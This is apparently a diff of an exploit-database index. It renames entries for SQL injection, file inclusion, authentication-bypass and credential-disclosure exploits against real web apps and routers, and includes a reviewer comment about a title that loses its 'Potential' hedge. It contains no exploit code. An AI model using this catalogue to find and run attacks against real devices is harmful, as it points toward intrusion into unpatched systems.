 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0
-3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Inclusion",2007-01-08,k1tk4t,php,webapps,0
+3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - '_config[site_path]' File Inclusion",2007-01-08,k1tk4t,php,webapps,0
 3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution",2007-01-08,DarkFig,php,webapps,0
 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0
@@ -25190,7 +25194,7 @@ id,file,description,date,author,platform,type,port
 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0
 16250,platforms/php/webapps/16250.txt,"WordPress Plugin jQuery Mega Menu 1.0 - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0
 16251,platforms/php/webapps/16251.txt,"WordPress Plugin OPS Old Post Spinner 2.2.1 - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0
-16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0
+16252,platforms/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",hardware,webapps,0
 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps,0
 16257,platforms/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps,0
 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0
@@ -25429,7 +25433,7 @@ id,file,description,date,author,platform,type,port
 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",php,webapps,0
 17347,platforms/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,php,webapps,0
-17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 - Exploit",2011-05-30,Aodrulez,hardware,webapps,0
+17349,platforms/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Exploit",2011-05-30,Aodrulez,hardware,webapps,0
 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,php,webapps,0
 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,windows,webapps,0
 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
@@ -25674,7 +25678,7 @@ id,file,description,date,author,platform,type,port
 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",windows,webapps,0
-17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
+17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
 17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,php,webapps,0
 17887,platforms/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0
 17888,platforms/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0
@@ -27495,7 +27499,7 @@ id,file,description,date,author,platform,type,port
 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0
 24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0
 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0
-24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Inclusion",2004-05-17,waraxe,php,webapps,0
+24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' Parameter File Inclusion",2004-05-17,waraxe,php,webapps,0
 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0
 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0
 24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0
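Review bot: Dropping the word "Potential" from the 24127 title changes what the entry claims, not just how it is formatted, and the same happens to 38651 in the @@ -36740 hunk, where "(Potential Code Execution / Denial of Service)" becomes "(Code Execution / Denial of Service)". Anyone triaging or prioritising patches from this index by title alone will now read both as confirmed impact. Whether the underlying advisories support that is not visible from the diff, so unless they do, I would keep the hedge while still applying the quoting normalisation, e.g. `"PHP-Nuke 6.x/7.x - 'Modpath' Parameter Potential File Inclusion"`.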
@@ -27646,7 +27650,7 @@ id,file,description,date,author,platform,type,port
 24424,platforms/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",php,webapps,0
 24425,platforms/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps,0
 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0
-24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0
+24441,platforms/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0
 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php' L' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0
 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0
 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0
@@ -27664,7 +27668,7 @@ id,file,description,date,author,platform,type,port
 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0
-24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
+24464,platforms/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,php,webapps,0
 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
 24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0
@@ -27691,7 +27695,7 @@ id,file,description,date,author,platform,type,port
 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0
 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0
 24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection",2013-02-17,3spi0n,php,webapps,0
-24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0
+24513,platforms/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0
 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0
 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0
 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection",2013-02-18,"Easy Laster",php,webapps,0
@@ -27892,7 +27896,7 @@ id,file,description,date,author,platform,type,port
 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0
 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0
 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0
-24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0
+24916,platforms/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0
 24924,platforms/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",hardware,webapps,0
 24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0
 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0
@@ -28263,7 +28267,7 @@ id,file,description,date,author,platform,type,port
 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0
 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,asp,webapps,0
 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0
-25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0
+25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",php,webapps,0
 25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0
 25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0
 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0
@@ -28599,17 +28603,17 @@ id,file,description,date,author,platform,type,port
 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0
 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0
 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0
-25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0
+25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0
 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0
 25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0
 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.asp Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0
 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
-25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
+25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0
 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0
-25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80
+25978,platforms/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80
 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",asp,webapps,0
 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - Forum.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
@@ -29991,7 +29995,7 @@ id,file,description,date,author,platform,type,port
 27855,platforms/php/webapps/27855.txt,"Vizra - A_Login.php Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0
 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0
 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0
-27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0
+27774,platforms/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0
 27776,platforms/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443
 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0
 27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
@@ -31888,7 +31892,7 @@ id,file,description,date,author,platform,type,port
 32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,asp,webapps,0
 32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,php,webapps,0
 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0
-33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0
+33984,platforms/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0
 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0
 30583,platforms/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0
 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0
@@ -33073,7 +33077,7 @@ id,file,description,date,author,platform,type,port
 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0
 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0
 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0
-32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0
+32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass",2008-10-06,WHK,php,webapps,0
 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0
@@ -33332,7 +33336,7 @@ id,file,description,date,author,platform,type,port
 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0
 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0
-32883,platforms/hardware/webapps/32883.txt,"Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
+32883,platforms/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080
 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",asp,webapps,0
 32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps,0
@@ -33444,7 +33448,7 @@ id,file,description,date,author,platform,type,port
 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0
 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80
-40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80
+40081,platforms/cgi/webapps/40081.py,"Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80
 40082,platforms/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80
 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0
@@ -33452,7 +33456,7 @@ id,file,description,date,author,platform,type,port
 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0
 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps,0
 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0
-33138,platforms/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0
+33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0
 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0
 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps,0
 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps,0
@@ -33979,7 +33983,7 @@ id,file,description,date,author,platform,type,port
 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
 34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
-34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
+34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
 34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0
@@ -34733,7 +34737,7 @@ id,file,description,date,author,platform,type,port
 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps,0
-35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0
+35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question",2011-02-10,"Core Security",php,webapps,0
 35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - EmployeeSearch.cc Multiple Parameter Cross-Site Scripting",2011-02-10,"Core Security",php,webapps,0
 35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
 35333,platforms/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps,0
@@ -36284,7 +36288,7 @@ id,file,description,date,author,platform,type,port
 37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
 37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",php,webapps,80
-37720,platforms/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
+37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80
@@ -36462,7 +36466,7 @@ id,file,description,date,author,platform,type,port
 38101,platforms/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0
 38102,platforms/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0
-38097,platforms/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
+38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081
 38105,platforms/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80
 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0
@@ -36638,7 +36642,7 @@ id,file,description,date,author,platform,type,port
 38445,platforms/php/webapps/38445.txt,"Joomla! Component 'com_realestatemanager' 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0
 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
-38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
+38449,platforms/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
